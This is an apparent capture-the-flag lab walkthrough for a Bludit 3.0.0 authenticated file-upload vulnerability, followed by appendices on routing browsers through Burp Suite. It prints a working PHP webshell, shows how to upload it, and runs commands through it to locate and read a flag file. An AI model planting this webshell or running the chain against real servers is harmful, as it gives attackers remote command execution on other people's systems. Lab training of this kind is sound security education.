Name CMS I: Web to Shell

URL https://www.ctf.live/challengedetails?cid=2

Type WebApps

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Mission:

An attacker might get administrative access to a web application. However, this does not
automatically mean that the web server can be compromised. In cases where a SaaS
application is made available to users, it is routine to give each user admin access to his own
instance of the web application e.g. a managed hosted Wordpress site. In such a scenario, the
attacker who will begin accessing the application as a managed administrative user will have to
figure out how to exploit the administrative interface to get a shell on the server. In some cases,
it might be possible to do privilege escalation as well.

The web application Bludit (3.0.0) is vulnerable.

In this challenge, the attacker has administrative access to the web application and needs to
find and exploit the vulnerability.

The following username and passwords may be used to explore the application and/or find a
vulnerability which might require authenticated access:

Username Password

admin password

Objective:​ Exploit the vulnerability and retrieve the flag.

Solution:

Step 1: ​Inspect the web application.

Step 2: ​Search on google “Bludit (3.0.0) vulnerability” and look for publically available exploits.
The exploit db link contains the information regarding the vulnerable web page.

Exploit DB Link: ​https://www.exploit-db.com/exploits/46060

Step 3: ​The user has to authenticate in order to exploit the vulnerability. Login to the web
application. The admin portal is located at “/admin”

URL: ​http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/admin/
The login credential of the web application is provided in the challenge description.

● Username: admin
● Password: password

Dashboard:
Step 4: ​Click on the “New Content” link provided on the left panel.
Step 5: ​Create a PHP webshell.

Save the below given PHP script as shell.php

<?php
$output = shell_exec($_GET["cmd"]);
echo "<pre>$output</pre>";
?>

Step 6: ​Configure burp suite and intercept the file upload request.

Check Appendix to learn how to configure Burp Suite.

Click on the Images Button:

Click on the Browse Button:

Upload the webshell and the request will be intercepted with Burpsuite.
Step 7: ​Forward the request and check the “HTTP History” tab.
Step 8:​ Select the forwarded POST request and click on the Response tab.

The PATH of the uploaded PHP webshell is revealed (The “/” were escaped).
​Step 9: ​Access the uploaded PHP script.

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.
php

No output is returned as “cmd” parameter was not passed.

Step 10: ​Execute system command by passing the “cmd” parameter.

Command: ​id

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.
php?cmd=id

The webserver is running with www-data user.

Step 11: ​Search for the flag on the filesystem

Command: ​find / -name *flag* 2>/dev/null

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.
php?cmd=find / -name *flag* 2>/dev/null

The location of the flag is revealed.

Step 12: ​Retrieve the flag.

Command: ​cat /var/www/html/flag-b429d4897b464de1e

URL:
http://k99ly8e5p6jeok8b4sf3ycae1.hidenseek-1.attackdefenselabs.com/bl-content/uploads/shell.
php?cmd=cat%20/var/www/html/flag-b429d4897b464de1e

Flag: ​b429d4897b464de1e59dd466584bb047
References:

1. Bludit (​https://github.com/bludit/bludit​)
2. CVE-2018-1000811
(​https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000811​)
3. bludit Pages Editor 3.0.0 - Arbitrary File Upload
(​https://www.exploit-db.com/exploits/46060​)
 Appendix

Appendix A: Configuration for Windows OS

A.1 Google Chrome with Burp Suite
A.2 Mozilla Firefox with Burp Suite

Appendix B: Configuration for Kali OS

B.1 Google Chrome with Burp Suite
B.2 Mozilla Firefox with Burp Suite

Appendix C: Configuration for FoxyProxy Standard plugin

C.1 FoxyProxy on Google Chrome with Burp Suite
C.2 FoxyProxy on Mozilla Firefox with Burp Suite
Appendix A

A.1 Google Chrome with Burp Suite (Windows OS)

Step 1: ​Open Google Chrome and navigate to the URL given below.

URL: ​chrome://settings

Google Chrome Settings page will appear.

Step 2:​ Search for “proxy” in the search box.

Step 3: ​Upon clicking on “Open proxy settings”, Windows “Internet Properties” settings dialog
box will appear. Click on “LAN settings” button.
Step 4: ​Select the checkbox “Use a proxy server for your LAN (These settings will not apply to
dial-up or VPN connections)”. And enter “127.0.0.1” and “8080” in “Address” textbox and “Port”
textbox respectively.

Click “OK” on the “Local Area Network (LAN) Settings” dialog box and close the “Internet
Properties” dialog box.

Step 5: ​Start Burp suite.

Step 6: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”.

All the HTTP request made by Google Chrome will be intercepted by Burp Suite.
A.2 Mozilla Firefox with burp suite (Windows OS)

Step 1: ​Open Mozilla Firefox and navigate to the URL given below.

URL: ​about:preferences
Step 2: ​Scroll down to the bottom of the page and click on “Settings” button under “Network
Settings” section.
Step 3: ​Enter “127.0.0.1” and “8080” in “HTTP Proxy” textbox and “Port” textbox respectively.

Click on the OK button.

Step 4: ​Start Burp suite.

Step 5: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”.

All the HTTP request made by Mozilla Firefox will be intercepted by Burp Suite.
Appendix B

B.1 Google Chrome with Burp Suite (Kali OS)

Step 1: ​Open Google Chrome and navigate to the URL given below.

URL: ​chrome://settings

Google Chrome Settings page will appear.

Step 2:​ Search for “proxy” in the search box.

Step 3: ​Upon clicking on “Open proxy settings”, The “Networks” settings window will appear.
Click on Network Proxy option.
Step 4: ​Enter “127.0.0.1” in “HTTP Proxy” textbox and enter 8080 as port.

Close the dialog box.

Step 5: ​Start Burp suite.

Step 6: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”.
All the HTTP/HTTPS request made by Google Chrome will be intercepted by Burp Suite.
B.2 Mozilla Firefox with burp suite (Kali OS)

Step 1: ​Open Mozilla Firefox and navigate to the URL given below.

URL: ​about:preferences

Step 2: ​Click on “Advanced” tab on the left panel and then click on “Settings” button under
“Network” tab.
Step 3: ​Enter “127.0.0.1” and “8080” in “HTTP Proxy” textbox and “Port” textbox respectively.
Step 4: ​Start Burp suite.

Step 5: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”.

All the HTTP request made by Mozilla Firefox will be intercepted by Burp Suite.
Appendix C

C.1 FoxyProxy on Google Chrome with Burp Suite

Step 1: ​Installing FoxyProxy.

FoxyProxy Standard plugin for Google Chrome can be installed from the URL given below:

URL:
https://chrome.google.com/webstore/detail/foxyproxy-standard/gcknhkkoolaabfmlnjonogaaifnjlfn
p?hl=en

After installing FoxyProxy, a small fox icon will appear on the right side of the address bar.

Step 2: ​Click on the FoxyProxy icon and click on Options.

Step 3: ​Click on the “Add New Proxy” Button.

Step 4: ​Enter “127.0.0.1” in “Host or IP Address” textbox and enter “8080” in Port textbox.
Click on the Save button.
The configured proxy will appear in the proxies table.

Step 5: ​Enable the proxy.

Click on the FoxyProxy icon and select the option “Use proxy 127.0.0.1:8080 for all URLs”

The FoxyProxy icon will change its color (In this case it is blue).
Step 6: ​Start Burp suite.

Step 7: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”.

All the HTTP/HTTPS request made by Google Chrome will be intercepted by Burp Suite.
C.2 FoxyProxy on Mozilla Firefox with Burp Suite

Step 1: ​Installing FoxyProxy.

FoxyProxy Standard plugin for Mozilla Firefox can be installed from the URL given below:

URL: ​https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

After installing FoxyProxy, a small fox icon will appear on the right side of the address bar.

Step 2: ​Click on the FoxyProxy icon and click on Options.

Step 3: ​Click on the add button on the left panel

Step 4: ​Enter “127.0.0.1” in “IP Address, DNS name, server name” textbox and enter “8080” in
Port textbox.

Click on the Save button.

The proxy will appear in the proxies table.

Step 5: ​Enable the proxy.

Click on the FoxyProxy icon and select the option “Use proxy 127.0.0.1:8080 for all URLs
(ignore patterns)”

The FoxyProxy icon will change its color (In this case it is green).
Step 6: ​Start Burp suite.

Step 7: ​Navigate to “Options” tab under “Proxy” tab and verify that the “running” checkbox is
selected for the interface “127.0.0.1:8080”

All the HTTP/HTTPS request made by Mozilla Firefox will be intercepted by Burp Suite.